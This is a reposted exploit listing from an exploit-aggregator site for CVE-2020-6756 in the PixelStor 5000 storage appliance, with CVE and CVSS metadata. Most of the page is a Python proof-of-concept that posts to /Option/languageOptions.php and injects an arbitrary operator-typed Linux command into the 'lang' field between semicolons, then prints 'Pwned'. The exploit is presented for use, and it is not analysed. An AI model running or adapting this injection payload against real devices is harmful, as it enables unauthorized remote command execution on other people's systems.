Advertisement






PixelStor 5000 K:4.0.1580-20150629 Remote Code Execution

CVE Category Price Severity
CVE-2020-6756 CWE-20 Unknown High
Author Risk Exploitation Type Date
N/A High Remote 2020-01-11
CPE
cpe:cpe:/a:pixelstor:5000:k4.0.1580
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H 0.5 0.4784

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020010087

Below is a copy:

PixelStor 5000 K:4.0.1580-20150629 Remote Code Execution
# Exploit Title: PixelStor 5000 - Remote Code Execution
# Product: PixelStor 5000
# Vendor: Rasilient
# Date: 2020-01-08
# Exploit Author: .:UND3R:.
# Vendor Homepage: http://rasilient.com
# Version: K:4.0.1580-20150629 (KDI Version)
# Tested on: K:4.0.1580-20150629 (KDI Version)
# CVE: CVE-2020-6756
# URL Author: https://pwnedchile.com
# Thanks: Dani Pelotocino <3, Roit

import requests, sys

def poc(target, cmd):
url = target + "/Option/languageOptions.php"
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
data = {"lang": ";" + cmd + ";/bin/echo -n en"}
r = requests.post(url, headers=headers, data=data)
if(r.status_code == 200):
print("\nPwned :]")
else:
print("\nNot vulnerable :(")

print("PixelStor 5000 RCE exploit\nVersion: K:4.0.1580-20150629 (KDI Version)\n\nAuthor: .:UND3R:.\nURL: https://pwnedchile.com\nThanks: Dani Pelotocino <3")

if len(sys.argv) !=2:
    print("\n[+] Usage: python " + sys.argv[0] + " <url>\n")
    sys.exit(1)

if __name__ == "__main__":
url = sys.argv[1]
cmd = raw_input("\n[Linux Command]:")
poc(url, cmd)
#EoF

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.